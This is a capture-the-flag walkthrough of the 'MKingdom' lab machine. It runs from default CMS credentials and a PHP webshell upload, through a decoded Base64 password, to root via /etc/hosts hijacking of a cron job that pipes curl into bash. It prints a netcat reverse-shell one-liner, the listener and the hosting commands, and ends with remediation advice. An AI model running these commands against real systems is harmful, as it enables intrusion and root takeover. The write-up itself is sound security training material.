Target IP: mkingdom.thm (Requires /etc/hosts entry)
Difficulty: Easy/Medium
Objective: User (mario) & Root (root.txt) Flags
1. Executive Summary
“MKingdom” is a Linux machine hosting a web application on a non-standard port (85). Initial access is gained by exploiting default credentials (admin:password) on a Concrete5 CMS installation, followed by enabling PHP file uploads to achieve Remote Code Execution (RCE). Lateral movement involves enumerating the file system to find encoded credentials for the user mario. Root privilege escalation is achieved by observing a system cron job executing a script via curl and exploiting a writable /etc/hosts file to redirect the request to a malicious server (DNS Spoofing), achieving arbitrary code execution as root.
Key TTPs (MITRE ATT&CK):
- T1078 (Valid Accounts): Default CMS credentials.
- T1190 (Exploit Public-Facing App): Uploading PHP webshell via CMS settings.
- T1552 (Unsecured Credentials): Finding Base64 passwords in environment files.
- T1053 (Scheduled Task/Job): Identifying the
counter.shcron job viapspy. - T1565.001 (Stored Data Manipulation): Modifying
/etc/hoststo hijack network traffic.
2. Operational Setup
Host Configuration
echo "10.10.x.x mkingdom.thm" | sudo tee -a /etc/hosts3. Enumeration
A. Network Scanning
You identified the critical vector immediately:
- 85/tcp (HTTP): Concrete5 CMS.
B. Web Exploitation (Concrete5)
- Access: You browsed to
http://mkingdom.thm:85/app/castle. - Credentials:
admin:password(Classic default). - RCE (File Upload):
- Concrete5 by default disallows PHP uploads.
- Bypass: Navigate to “System & Settings” -> “Allowed File Types”.
- Action: Append
.phpto the allowed list. - Exploit: Upload a PHP reverse shell via the File Manager.
Status: Shell as www-data.
4. Lateral Movement: Mario
A. Enumeration
Running linpeas.sh highlighted suspicious environment variables or config files.
- Database: Unauthenticated access found, but credentials (
admin:password) were dead ends for system access. - System Files: You found a Base64 encoded string in the web directory or a config file.
echo "aWthVGVOVEFOdEVT" | base64 -d
# Result: ikaTeNTANtESB. Access
su mario
# Password: ikaTeNTANtESStatus: User mario.
5. Privilege Escalation: The “DNS Poisoning”
A. Process Snooping (PSPY)
Since standard sudo -l showed unconventional binaries (/usr/bin/id), you dug deeper using pspy64 to watch running processes.
The Finding:
CMD: UID=0 ... /bin/sh -c curl mkingdom.thm:85/app/castle/application/counter.sh | bash >> /var/log/up.logAnalysis:
- User: Root (UID 0).
- Action: It fetches a script from
mkingdom.thm:85and pipes it directly intobash. - Vulnerability: We cannot edit
counter.shdirectly (permissions denied), BUT we need to control what the server thinksmkingdom.thmis.
B. The Exploit (Local DNS Poisoning)
We check permissions on the hosts file.
ls -l /etc/hosts
# -rw-rw-r-- 1 root mario ... /etc/hostsCritical Flaw: The group mario has Write access to /etc/hosts.
Execution:
- Setup Malicious Server (Attacker Machine):
- Create the directory structure to match the request:
mkdir -p app/castle/application/ - Create a malicious
counter.sh:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.YOUR.IP 9001 >/tmp/f" > app/castle/application/counter.sh- Start Python Web Server on Port 85:
sudo python3 -m http.server 85- Start Listener:
nc -lvnp 9001- Poison the Victim:
On the victim machine (as
mario), edit/etc/hosts. Change:127.0.0.1 mkingdom.thmTo:10.10.YOUR.IP mkingdom.thm - Trigger:
Wait for the cron job to run. The root user attempts to curl
mkingdom.thm, which now resolves to your machine. It downloads your reverse shell and executes it as root.
Result:
# whoami
rootRoot Flag: /root/root.txt.
6. Remediation (Blue Team)
- File Permissions:
/etc/hostsshould never be writable by standard users. It allows for traffic interception and spoofing of trusted internal services.- Fix:
chmod 644 /etc/hostsandchown root:root /etc/hosts.
- Unsafe Execution:
- Never pipe
curldirectly intobash(curl | bash) for automated tasks, especially over HTTP. This provides no integrity checking. - If remote execution is required, use HTTPS with certificate verification, or verify a GPG signature of the script before execution.
- CMS Hardening:
- Remove default credentials immediately.
- Restrict file upload types at the server level (Apache/Nginx config), not just within the application logic.